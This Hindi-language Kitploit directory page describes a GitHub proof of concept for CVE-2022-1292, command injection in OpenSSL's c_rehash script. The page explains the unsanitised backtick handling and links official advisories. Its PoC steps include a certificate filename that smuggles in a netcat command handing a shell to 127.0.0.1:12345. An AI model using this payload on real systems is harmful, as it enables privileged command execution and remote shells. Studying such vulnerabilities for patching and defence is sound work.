Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-1292 — CVE-2022-1292 OpenSSL c_rehash भेद्यता - POC | Kitploit
उपकरण/GitHubGitHub/alcaparra/cve-2022-1292
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubalcaparra/cve-2022-1292

CVE-2022-1292

CVE-2022-1292 OpenSSL c_rehash भेद्यता - POC

रिपॉजिटरी देखें
2884 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-1292 POC

POC स्क्रीनशॉट

विवरण

root@kitploit:~
c_rehash स्क्रिप्ट कमांड इंजेक्शन को रोकने के लिए शेल मेटाकैरेक्टरों को ठीक से सैनिटाइज़ नहीं करती है। 
यह स्क्रिप्ट कुछ ऑपरेटिंग सिस्टम द्वारा इस प्रकार वितरित की जाती है कि यह स्वचालित रूप से निष्पादित होती है।
ऐसे ऑपरेटिंग सिस्टम पर, एक हमलावर स्क्रिप्ट के विशेषाधिकारों के साथ मनमाने कमांड निष्पादित कर सकता है।
c_rehash स्क्रिप्ट का उपयोग अप्रचलित माना जाता है और इसे OpenSSL rehash कमांड लाइन टूल द्वारा प्रतिस्थापित किया जाना चाहिए।

यह स्क्रिप्ट update-ca-certificates द्वारा, ca-certificates से,
/etc/ssl/certs/ में प्रमाणपत्रों को re-hash करने के लिए निष्पादित की जाती है। एक हमलावर
इस निर्देशिका में फ़ाइलें रखने में सक्षम होकर स्क्रिप्ट के विशेषाधिकारों के साथ
मनमाने कमांड निष्पादित कर सकता है।

कमांड इंजेक्शन इसलिए होता है क्योंकि फ़ाइलनाम ठीक से सैनिटाइज़ नहीं किए जाते:

  • $fname =~ s/'/'\\''/g;
  • my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`;

स्क्रिप्ट का यह भाग असुरक्षित है, क्योंकि बैकटिक्स को बंद करने से कमांड निष्पादन संभव हो जाता है। उदाहरण के लिए, एक फ़ाइल जिसका नाम MyCert.crt`whoami` है, "whoami" चलाएगी।

POC

  1. /etc/ssl/certs/ (डिफ़ॉल्ट) या update-ca-certificates में कॉन्फ़िगर किए गए अन्य पथों पर जाएँ
  2. echo "-----BEGIN CERTIFICATE-----" > "hey.crt\`nc -c sh 127.0.0.1 12345\`" (पेलोड उदाहरण के रूप में nc)
  3. फिर update-ca-certificates के निष्पादन होने तक प्रतीक्षा करें। आप इसे c_rehash . से मैन्युअल रूप से ट्रिगर कर सकते हैं।

संदर्भ

  • https://www.cvedetails.com/cve/CVE-2022-1292/
  • https://www.debian.org/security/2022/dsa-5139
  • https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html
  • https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2
  • https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23
  • https://www.openssl.org/news/secadv/20220503.txt
टूल डाउनलोड करें